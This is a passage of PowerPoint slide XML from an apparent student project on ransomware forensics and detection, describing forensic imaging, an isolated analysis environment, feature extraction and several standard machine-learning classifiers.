          <a:p>
            <a:pPr lvl="3" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The system outlines both physical and logical methods for acquiring forensic copies (images) of attacked computer systems, ensuring flexibility and adaptability based on the availability of resources and system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>configurations. By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>providing options for image acquisition, the system caters to diverse scenarios, allowing investigators to choose the most appropriate method based on the specific characteristics of the target system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.1.2 Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe Environment for Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Emphasizing the importance of preserving the integrity of live systems, the design incorporates an isolated analysis environment where all investigations are conducted on acquired images.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This approach minimizes the risk of further harm to live systems while facilitating thorough analysis, ensuring the safety and integrity of the investigative process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41027073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31231"/>
            <a:ext cx="10515600" cy="5788413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Additionally, by separating the analysis environment from the live systems, it allows for controlled experimentation and forensic examination without the potential for unintended consequences or disruptions to critical operations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.1.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Behavior Identification: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Central to the system's methodology is a systematic approach focused on discerning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> attributes via meticulous feature extraction and selection. Through rigorous examination, crucial features essential for precise analysis—such as file-array movements and code architecture—are meticulously extracted and prioritized. This meticulous process serves to streamline analysis methodologies, bolstering both detection accuracy and efficiency. Moreover, by harnessing advanced machine learning algorithms, the system continuously refines its feature extraction techniques to adapt to the evolving landscape of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> behaviors and attack patterns. This adaptive capability ensures the system remains resilient and effective in combating emerging threats in real-time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="539907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3" y="384470"/>
            <a:ext cx="10515600" cy="6068088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.2	Method &amp; Algorithm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	3.2.1	Method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gaussian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Naive Bayes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GaussianNB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>): </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Gaussian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Naive Bayes is a probabilistic classifier based on Bayes' theorem. It assumes that features are independent of each other given the class. Despite its simplicity, it's effective, particularly in text classification tasks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	3.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decision </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tree: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Decision Tree is a tree-like structure where each internal node represents a feature, each branch represents a decision, and each leaf node represents a class label. They're intuitive and easy to interpret, but can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>overfit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> with complex trees.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	3.2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forest: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Forest is an ensemble learning method that constructs multiple decision trees during training and combines their outputs for improved accuracy. It reduces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>overfitting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> by randomly selecting feature subsets for each tree and averaging the results. It's popular for its simplicity and high </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>performance.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5782535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0204" y="695021"/>
            <a:ext cx="10033804" cy="5028256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.2	Method &amp; Algorithm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.2.4	Method 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logistic Regression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Logistic Regression is a statistical method used for binary classification. It predicts the probability of an instance belonging to a particular class. Despite its name, it's a linear model that uses the logistic function to constrain predictions between 0 and 1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	3.2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Method 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gradient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Boosting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Classifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Gradient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Boosting Classifier is an ensemble learning technique that builds a strong predictive model by sequentially adding trees, each correcting errors made by the previous one. It's known for its high predictive accuracy and is widely used in competitions and real-world applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10349274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4287" y="267419"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.3	Project Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Diagram</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5D49FD7-5F7D-E3E3-D469-9460CAB52CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3323915" y="1384563"/>
            <a:ext cx="5839460" cy="5300345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="812569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4287" y="267419"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.3	Project Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Class Diagram</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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151" y="1492551"/>
            <a:ext cx="6295619" cy="3652155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="180000" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026705" y="3010852"/>
            <a:ext cx="1226234" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="0" rev="738000"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>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Request()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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099095" y="3472133"/>
            <a:ext cx="1446329" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="0" rev="738000"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>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Response()</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85960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4287" y="267419"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
